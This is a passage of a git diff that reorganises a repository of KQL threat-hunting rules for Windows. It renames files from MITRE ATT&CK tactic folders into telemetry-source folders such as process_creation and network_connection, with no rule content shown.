KQL/rules-threat-hunting/Defense Evasion/dmp_hdmp_file_creation.kql rename to KQL/rules-threat-hunting/windows/file/file_event/dmp_hdmp_file_creation.kql diff --git a/KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/pfx_file_creation.kql rename to KQL/rules-threat-hunting/windows/file/file_event/pfx_file_creation.kql diff --git a/KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql b/KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/python_path_configuration_file_creation_windows.kql rename to KQL/rules-threat-hunting/windows/file/file_event/python_path_configuration_file_creation_windows.kql diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql b/KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/scheduled_task_created_filecreation.kql rename to KQL/rules-threat-hunting/windows/file/file_event/scheduled_task_created_filecreation.kql diff --git a/KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql b/KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql similarity index 100% rename from KQL/rules-threat-hunting/Command and Control/vscode_code_tunnel_execution_file_indicator.kql rename to KQL/rules-threat-hunting/windows/file/file_event/vscode_code_tunnel_execution_file_indicator.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql b/KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/wdac_policy_file_creation_in_codeintegrity_folder.kql rename to KQL/rules-threat-hunting/windows/file/file_event/wdac_policy_file_creation_in_codeintegrity_folder.kql diff --git a/KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql b/KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql similarity index 100% rename from KQL/rules-threat-hunting/Initial Access/webdav_temporary_local_file_creation.kql rename to KQL/rules-threat-hunting/windows/file/file_event/webdav_temporary_local_file_creation.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/amsi_dll_load_by_uncommon_process.kql rename to KQL/rules-threat-hunting/windows/image_load/amsi_dll_load_by_uncommon_process.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql rename to KQL/rules-threat-hunting/windows/image_load/bits_client_bitsproxy_dll_loaded_by_uncommon_process.kql diff --git a/KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql b/KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql rename to KQL/rules-threat-hunting/windows/image_load/dbghelp_dbgcore_dll_loaded_by_uncommon_suspicious_process.kql diff --git a/KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/microsoft_excel_add_in_loaded.kql rename to KQL/rules-threat-hunting/windows/image_load/microsoft_excel_add_in_loaded.kql diff --git a/KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql b/KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/microsoft_word_add_in_loaded.kql rename to KQL/rules-threat-hunting/windows/image_load/microsoft_word_add_in_loaded.kql diff --git a/KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql b/KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql similarity index 100% rename from KQL/rules-threat-hunting/Collection/system_drawing_dll_load.kql rename to KQL/rules-threat-hunting/windows/image_load/system_drawing_dll_load.kql diff --git a/KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql b/KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql similarity index 100% rename from KQL/rules-threat-hunting/Persistence/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql rename to KQL/rules-threat-hunting/windows/image_load/task_scheduler_dll_loaded_by_application_located_in_potentially_suspicious_location.kql diff --git a/KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql b/KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/wmi_module_loaded_by_uncommon_process.kql rename to KQL/rules-threat-hunting/windows/image_load/wmi_module_loaded_by_uncommon_process.kql diff --git a/KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql b/KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/dfsvc_exe_network_connection_to_non_local_ips.kql rename to KQL/rules-threat-hunting/windows/network_connection/dfsvc_exe_network_connection_to_non_local_ips.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql b/KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql rename to KQL/rules-threat-hunting/windows/network_connection/dllhost_exe_initiated_network_connection_to_non_local_ip_address.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/hh_exe_initiated_http_network_connection.kql rename to KQL/rules-threat-hunting/windows/network_connection/hh_exe_initiated_http_network_connection.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql b/KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/msiexec_exe_initiated_network_connection_over_http.kql rename to KQL/rules-threat-hunting/windows/network_connection/msiexec_exe_initiated_network_connection_over_http.kql diff --git a/KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/network_connection_initiated_by_powershell_process.kql rename to KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_by_powershell_process.kql diff --git a/KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql b/KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql similarity index 100% rename from KQL/rules-threat-hunting/Command and Control/network_connection_initiated_from_users_public_folder.kql rename to KQL/rules-threat-hunting/windows/network_connection/network_connection_initiated_from_users_public_folder.kql diff --git a/KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql b/KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql similarity index 100% rename from KQL/rules-threat-hunting/Command and Control/potentially_suspicious_azure_front_door_connection.kql rename to KQL/rules-threat-hunting/windows/network_connection/potentially_suspicious_azure_front_door_connection.kql diff --git a/KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql b/KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/arbitrary_command_execution_using_wsl.kql rename to KQL/rules-threat-hunting/windows/process_creation/arbitrary_command_execution_using_wsl.kql diff --git a/KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/cab_file_extraction_via_wusa_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/cab_file_extraction_via_wusa_exe.kql diff --git a/KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql b/KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/clickonce_deployment_execution_dfsvc_exe_child_process.kql rename to KQL/rules-threat-hunting/windows/process_creation/clickonce_deployment_execution_dfsvc_exe_child_process.kql diff --git a/KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql b/KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql similarity index 100% rename from KQL/rules-threat-hunting/Discovery/cmd_shell_output_redirect.kql rename to KQL/rules-threat-hunting/windows/process_creation/cmd_shell_output_redirect.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql b/KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/codepage_modification_via_mode_com.kql rename to KQL/rules-threat-hunting/windows/process_creation/codepage_modification_via_mode_com.kql diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql similarity index 100% rename from KQL/rules-threat-hunting/Command and Control/curl_exe_execution.kql rename to KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution.kql diff --git a/KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql b/KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql similarity index 100% rename from KQL/rules-threat-hunting/Command and Control/curl_exe_execution_with_custom_useragent.kql rename to KQL/rules-threat-hunting/windows/process_creation/curl_exe_execution_with_custom_useragent.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/diskshadow_child_process_spawned.kql rename to KQL/rules-threat-hunting/windows/process_creation/diskshadow_child_process_spawned.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/diskshadow_script_mode_execution.kql rename to KQL/rules-threat-hunting/windows/process_creation/diskshadow_script_mode_execution.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/dll_call_by_ordinal_via_rundll32_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/dll_call_by_ordinal_via_rundll32_exe.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/dynamic_net_compilation_via_csc_exe_hunting.kql rename to KQL/rules-threat-hunting/windows/process_creation/dynamic_net_compilation_via_csc_exe_hunting.kql diff --git a/KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql b/KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql similarity index 100% rename from KQL/rules-threat-hunting/Privilege Escalation/elevated_system_shell_spawned.kql rename to KQL/rules-threat-hunting/windows/process_creation/elevated_system_shell_spawned.kql diff --git a/KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql b/KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/eventlog_query_requests_by_builtin_utilities.kql rename to KQL/rules-threat-hunting/windows/process_creation/eventlog_query_requests_by_builtin_utilities.kql diff --git a/KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql similarity index 100% rename from KQL/rules-threat-hunting/Persistence/execution_from_webserver_root_folder.kql rename to KQL/rules-threat-hunting/windows/process_creation/execution_from_webserver_root_folder.kql diff --git a/KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Command and Control/file_download_via_curl_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/file_download_via_curl_exe.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql b/KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/file_or_folder_permissions_modifications.kql rename to KQL/rules-threat-hunting/windows/process_creation/file_or_folder_permissions_modifications.kql diff --git a/KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql b/KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql similarity index 100% rename from KQL/rules-threat-hunting/Exfiltration/ftp_connection_open_attempt_via_winscp_cli.kql rename to KQL/rules-threat-hunting/windows/process_creation/ftp_connection_open_attempt_via_winscp_cli.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/headless_process_launched_via_conhost_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/headless_process_launched_via_conhost_exe.kql diff --git a/KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/import_new_module_via_powershell_commandline.kql rename to KQL/rules-threat-hunting/windows/process_creation/import_new_module_via_powershell_commandline.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql b/KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql rename to KQL/rules-threat-hunting/windows/process_creation/invocation_of_crypto_classes_from_the_cryptography_powershell_namespace.kql diff --git a/KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql b/KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/manual_execution_of_script_inside_of_a_compressed_file.kql rename to KQL/rules-threat-hunting/windows/process_creation/manual_execution_of_script_inside_of_a_compressed_file.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/microsoft_workflow_compiler_execution.kql rename to KQL/rules-threat-hunting/windows/process_creation/microsoft_workflow_compiler_execution.kql diff --git a/KQL/rules-threat-hunting/Discovery/net_exe_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql similarity index 100% rename from KQL/rules-threat-hunting/Discovery/net_exe_execution.kql rename to KQL/rules-threat-hunting/windows/process_creation/net_exe_execution.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/new_self_extracting_package_created_via_iexpress_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/new_self_extracting_package_created_via_iexpress_exe.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql b/KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql rename to KQL/rules-threat-hunting/windows/process_creation/new_windows_firewall_rule_added_via_new_netfirewallrule_cmdlet.kql diff --git a/KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql b/KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql similarity index 100% rename from KQL/rules-threat-hunting/Collection/password_protected_compressed_file_extraction_via_7zip.kql rename to KQL/rules-threat-hunting/windows/process_creation/password_protected_compressed_file_extraction_via_7zip.kql diff --git a/KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/potential_boinc_software_execution_uc_berkeley_signature_.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_boinc_software_execution_uc_berkeley_signature_.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_commandline_obfuscation_using_unicode_characters.kql diff --git a/KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Exfiltration/potential_data_exfiltration_via_curl_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_data_exfiltration_via_curl_exe.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/potential_dll_sideloading_activity_via_extexport_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_dll_sideloading_activity_via_extexport_exe.kql diff --git a/KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/potential_file_override_append_via_set_command.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_file_override_append_via_set_command.kql diff --git a/KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Credential Access/potential_password_reconnaissance_via_findstr_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_password_reconnaissance_via_findstr_exe.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/potential_proxy_execution_via_explorer_exe_from_shell_process.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_proxy_execution_via_explorer_exe_from_shell_process.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql b/KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/potential_suspicious_execution_from_guid_like_folder_names.kql rename to KQL/rules-threat-hunting/windows/process_creation/potential_suspicious_execution_from_guid_like_folder_names.kql diff --git a/KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql similarity index 100% rename from KQL/rules-threat-hunting/Collection/potentially_suspicious_compression_tool_parameters.kql rename to KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_compression_tool_parameters.kql diff --git a/KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql b/KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/potentially_suspicious_powershell_child_processes.kql rename to KQL/rules-threat-hunting/windows/process_creation/potentially_suspicious_powershell_child_processes.kql diff --git a/KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql b/KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/process_execution_from_webdav_share.kql rename to KQL/rules-threat-hunting/windows/process_creation/process_execution_from_webdav_share.kql diff --git a/KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql b/KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql similarity index 100% rename from KQL/rules-threat-hunting/Impact/process_terminated_via_taskkill.kql rename to KQL/rules-threat-hunting/windows/process_creation/process_terminated_via_taskkill.kql diff --git a/KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql similarity index 100% rename from KQL/rules-threat-hunting/Command and Control/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_action1_arbitrary_code_execution_and_remote_sessions.kql diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/remote_access_tool_ammy_admin_agent_execution.kql rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_ammy_admin_agent_execution.kql diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/remote_access_tool_cmd_exe_execution_via_anyviewer.kql rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_cmd_exe_execution_via_anyviewer.kql diff --git a/KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql b/KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/remote_access_tool_screenconnect_remote_command_execution_hunting.kql rename to KQL/rules-threat-hunting/windows/process_creation/remote_access_tool_screenconnect_remote_command_execution_hunting.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql b/KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql rename to KQL/rules-threat-hunting/windows/process_creation/rundll32_exe_calling_dllregisterserver_export_function_explicitly.kql diff --git a/KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql similarity index 100% rename from KQL/rules-threat-hunting/Discovery/sc_exe_query_execution.kql rename to KQL/rules-threat-hunting/windows/process_creation/sc_exe_query_execution.kql diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql b/KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/scheduled_task_creation_from_potential_suspicious_parent_location.kql rename to KQL/rules-threat-hunting/windows/process_creation/scheduled_task_creation_from_potential_suspicious_parent_location.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/set_files_as_system_files_using_attrib_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/set_files_as_system_files_using_attrib_exe.kql diff --git a/KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Lateral Movement/smb_over_quic_via_net_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/smb_over_quic_via_net_exe.kql diff --git a/KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/suspicious_new_instance_of_an_office_com_object.kql rename to KQL/rules-threat-hunting/windows/process_creation/suspicious_new_instance_of_an_office_com_object.kql diff --git a/KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql b/KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql similarity index 100% rename from KQL/rules-threat-hunting/Discovery/suspicious_tasklist_discovery_command.kql rename to KQL/rules-threat-hunting/windows/process_creation/suspicious_tasklist_discovery_command.kql diff --git a/KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql b/KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql similarity index 100% rename from KQL/rules-threat-hunting/Discovery/system_information_discovery_via_wmic_exe.kql rename to KQL/rules-threat-hunting/windows/process_creation/system_information_discovery_via_wmic_exe.kql diff --git a/KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql b/KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql similarity index 100% rename from KQL/rules-threat-hunting/Exfiltration/tunneling_tool_execution.kql rename to KQL/rules-threat-hunting/windows/process_creation/tunneling_tool_execution.kql diff --git a/KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql b/KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/unusually_long_powershell_commandline.kql rename to KQL/rules-threat-hunting/windows/process_creation/unusually_long_powershell_commandline.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql b/KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/use_short_name_path_in_command_line.kql rename to KQL/rules-threat-hunting/windows/process_creation/use_short_name_path_in_command_line.kql diff --git a/KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql b/KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql similarity index 100% rename from KQL/rules-threat-hunting/Exfiltration/winscp_execution_from_non_standard_folder.kql rename to KQL/rules-threat-hunting/windows/process_creation/winscp_execution_from_non_standard_folder.kql diff --git a/KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql b/KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql rename to KQL/rules-threat-hunting/windows/process_creation/wsf_jse_js_vba_vbe_file_execution_via_cscript_wscript.kql diff --git a/KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/scheduled_task_created_registry.kql rename to KQL/rules-threat-hunting/windows/registry/registry_event/scheduled_task_created_registry.kql diff --git a/KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql similarity index 100% rename from KQL/rules-threat-hunting/Execution/command_executed_via_run_dialog_box_registry.kql rename to KQL/rules-threat-hunting/windows/registry/registry_set/command_executed_via_run_dialog_box_registry.kql diff --git a/KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql b/KQL/rules-threat-hunting/windows/registry/registry_set/microsoft_office_trusted_location_updated.kql similarity index 100% rename from KQL/rules-threat-hunting/Defense Evasion/microsoft_office_trusted_location_updated.kql rename to 